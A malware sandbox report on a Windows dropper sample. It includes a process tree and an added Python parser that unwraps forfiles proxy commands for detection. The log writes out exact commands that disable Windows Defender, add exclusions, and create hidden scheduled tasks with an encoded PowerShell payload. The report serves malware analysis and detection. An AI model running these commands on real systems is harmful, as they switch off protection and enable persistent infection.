Analysis
max time kernel: 195s
max time network: 196s
platform: windows7_x64
resource: win7-20240419-en
resource tags: arch:x64, arch:x86, image:win7-20240419-en, locale:en-us, os:windows7-x64, system
submitted: 01/05/2024, 23:51
Static task: static1
Behavioral task: behavioral1
Sample: bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe
Resource: win7-20240419-en
General
Target: bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe
Size: 7.3MB
MD5: 49c1c3d1621a7af828cde4e712a64f26
SHA1: ba16d384f3fbd954eaa8deab2808e2341fd7466e
SHA256: bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3
SHA512: 0a954fe59edfc36d62859f8ca9cd32d5043662f92aa2c4d136fee185ec3c3ce305d1f0c55dc1301eb1956fb6885dff973ba2b0074dad5ffaac9e95b712f4398f
SSDEEP: 196608:91OBiBwIPypbHKxKJAkezCFo3+vy80LtkJL5e+2Xo:3OBiB/P4b/e6K/jaDwo
Malware Config
Signatures
- Key created: \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PqbaBdNutUHU2 = "0" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tcAZjUgKvOkyC = "0" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw = "0" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tcAZjUgKvOkyC = "0" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\vTGqftCYFnqsQTavPzR = "0" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\lExdmLMBU = "0" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ruvdGviMRzUn = "0" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw = "0" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\TtNtWPRQARDvDBvI = "0" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\TtNtWPRQARDvDBvI = "0" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\TtNtWPRQARDvDBvI = "0" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\vTGqftCYFnqsQTavPzR = "0" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\ypvfxRdiVpdIIEVB = "0" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PqbaBdNutUHU2 = "0" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\lExdmLMBU = "0" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ruvdGviMRzUn = "0" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\ypvfxRdiVpdIIEVB = "0" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\TtNtWPRQARDvDBvI = "0" (reg.exe)
Blocklisted process makes network request 1 IoCs
- flow 24, PID 2316, rundll32.exe
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (Install.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (rundll32.exe)
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
- Key value queried: \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Control Panel\International\Geo\Nation (lnsBcGR.exe)
Executes dropped EXE 4 IoCs
- PID 2564: Install.exe
- PID 2628: Install.exe
- PID 856: kVOVvTh.exe
- PID 1220: lnsBcGR.exe
Loads dropped DLL 12 IoCs
- PID 1884: bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe
- PID 2564: Install.exe
- PID 2564: Install.exe
- PID 2564: Install.exe
- PID 2564: Install.exe
- PID 2628: Install.exe
- PID 2628: Install.exe
- PID 2628: Install.exe
- PID 2316: rundll32.exe
- PID 2316: rundll32.exe
- PID 2316: rundll32.exe
- PID 2316: rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops Chrome extension 2 IoCs
- File created: C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json (lnsBcGR.exe)
- File created: C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json (lnsBcGR.exe)
Drops file in System32 directory 27 IoCs
Drops file in Program Files directory 13 IoCs
- File created: C:\Program Files (x86)\lExdmLMBU\wHsUjx.dll (lnsBcGR.exe)
- File opened for modification: C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi (lnsBcGR.exe)
- File created: C:\Program Files (x86)\lExdmLMBU\TqEKbTe.xml (lnsBcGR.exe)
- File created: C:\Program Files (x86)\vTGqftCYFnqsQTavPzR\yjEkrSQ.xml (lnsBcGR.exe)
- File created: C:\Program Files (x86)\tcAZjUgKvOkyC\ptGtmGk.dll (lnsBcGR.exe)
- File created: C:\Program Files (x86)\ruvdGviMRzUn\aBijeXM.dll (lnsBcGR.exe)
- File created: C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi (lnsBcGR.exe)
- File created: C:\Program Files\Mozilla Firefox\browser\omni.ja.bak (lnsBcGR.exe)
- File opened for modification: C:\Program Files\Mozilla Firefox\browser\omni.ja (lnsBcGR.exe)
- File created: C:\Program Files (x86)\PqbaBdNutUHU2\bwRHPstUnjfxS.dll (lnsBcGR.exe)
- File created: C:\Program Files (x86)\PqbaBdNutUHU2\xTItakc.xml (lnsBcGR.exe)
- File created: C:\Program Files (x86)\vTGqftCYFnqsQTavPzR\IfBFXIa.dll (lnsBcGR.exe)
- File created: C:\Program Files (x86)\tcAZjUgKvOkyC\EUUntFm.xml (lnsBcGR.exe)
Drops file in Windows directory 4 IoCs
- File created: C:\Windows\Tasks\baOmDneVXoOuKLmJPZ.job (schtasks.exe)
- File created: C:\Windows\Tasks\YoRBImjUnYbxcjeUQ.job (schtasks.exe)
- File created: C:\Windows\Tasks\kRLTqYWysAZjVOw.job (schtasks.exe)
- File created: C:\Windows\Tasks\qZvWQJXUOVWXUoxnV.job (schtasks.exe)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
- schtasks.exe, PIDs: 112, 1664, 2248, 1452, 1708, 2440, 2468, 868, 1000, 1604, 764, 1892
Enumerates system info in registry 2 TTPs 4 IoCs
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (Install.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (Install.exe)
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (rundll32.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (rundll32.exe)
Modifies data under HKEY_USERS 64 IoCs
Suspicious behavior: EnumeratesProcesses 39 IoCs
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe"C:\Users\Admin\AppData\Local\Temp\bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Users\Admin\AppData\Local\Temp\7zS1DDD.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Users\Admin\AppData\Local\Temp\7zS1FB1.tmp\Install.exe.\Install.exe /FddidfBPP "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:2736 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:2588
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:2508 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵PID:2800
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"5⤵PID:2784
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2968
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵PID:2156
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"5⤵PID:2584
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2472
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:2468
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵PID:2488
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵PID:2504
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2536 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force8⤵PID:1880
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵PID:1492
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵PID:1460
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1472 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2128
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "baOmDneVXoOuKLmJPZ" /SC once /ST 23:52:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw\HQTPPrichaMbyDn\kVOVvTh.exe\" 4w /VZydidGlTW 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1452
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn baOmDneVXoOuKLmJPZ"4⤵PID:2532
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn baOmDneVXoOuKLmJPZ5⤵PID:1364
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn baOmDneVXoOuKLmJPZ6⤵PID:1444
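Every reg.exe and powershell.exe in the Install.exe tree above is reached through two proxy layers. forfiles.exe is pointed at c:\windows\system32 with a /m mask that matches exactly one existing binary (where.exe, calc.exe, waitfor.exe, help.exe), so its /c command runs exactly once; that command is itself cmd /C wrapping the real reg add or powershell call, which is why the tree reads forfiles.exe → cmd.exe → reg.exe rather than cmd.exe → reg.exe. The \" sequences are cmd's way of passing literal quotes through, and forfiles.exe's argv parsing turns them back into plain quotes. An added Python example, not part of the report, that splits the compound command handed to cmd.exe and peels both layers to recover the inner commands and the file mask used as the trigger; the compound string is a constructed copy of three of the five segments shown above:

```python
import re

# Constructed copy of the compound command that Install.exe handed to cmd.exe /C
# in this report (three of its five forfiles segments), with the cmd-escaped
# quotes \" left exactly as the report shows them.
COMPOUND = (
    r'forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"'
    r' & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"'
    r' & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"'
)

# forfiles /p <dir> /m <mask> /c "<command>": the command runs once per file
# matching the mask, so a mask naming exactly one system binary turns
# forfiles into a one-shot proxy launcher.
FORFILES_RE = re.compile(
    r'^\s*forfiles(?:\.exe)?\s+/p\s+(?P<path>\S+)\s+/m\s+(?P<mask>\S+)\s+/c\s+"(?P<cmd>.*)"\s*$',
    re.IGNORECASE,
)
CMD_C_RE = re.compile(r'^\s*cmd(?:\.exe)?\s+/c\s+(?P<cmd>.*)$', re.IGNORECASE)


def split_compound(cmdline):
    """Split a cmd.exe command line on the ' & ' sequence operator."""
    return [p.strip() for p in re.split(r'\s&\s', cmdline) if p.strip()]


def unwrap(cmdline):
    """Peel forfiles /c and cmd /C layers.

    Returns (layers, innermost_command, trigger_mask). The \\" sequences inside
    the forfiles /c string are restored to plain quotes, which is what the
    CRT argv parser in forfiles.exe does before it launches the command."""
    layers, cur, trigger = [], cmdline, None
    while True:
        m = FORFILES_RE.match(cur)
        if m:
            trigger = m['mask']
            layers.append(f"forfiles /p {m['path']} /m {m['mask']}")
            cur = m['cmd'].replace('\\"', '"')
            continue
        m = CMD_C_RE.match(cur)
        if m:
            layers.append('cmd /C')
            cur = m['cmd']
            continue
        return layers, cur.strip(), trigger


def triage(compound):
    """One (trigger_mask, innermost_command, layer_count) row per segment."""
    out = []
    for seg in split_compound(compound):
        layers, inner, trigger = unwrap(seg)
        out.append((trigger, inner, len(layers)))
    return out


if __name__ == "__main__":
    for trigger, inner, depth in triage(COMPOUND):
        print(f"[{depth} layers, trigger {trigger}] {inner}")
```

The mask is worth keeping in the output: forfiles with /m set to a single well-known binary name and /c starting with cmd is a usable detection on its own, independent of whatever the inner command turns out to be.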
C:\Windows\system32\taskeng.exetaskeng.exe {D7CC79BF-403D-48F1-979A-54979512F035} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2364
-
C:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw\HQTPPrichaMbyDn\kVOVvTh.exeC:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw\HQTPPrichaMbyDn\kVOVvTh.exe 4w /VZydidGlTW 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:856 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:1660
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:1936
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:1940
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:2248
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:1980
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:2172
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:1680
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:1220
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2228
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2888
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:2880
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:2452
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2456
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:2276
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:1664
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:352 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:972
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gTuxKqbKc" /SC once /ST 13:21:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1708
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gTuxKqbKc"3⤵PID:1788
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gTuxKqbKc"3⤵PID:1976
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:2900
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:2908
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1572
-
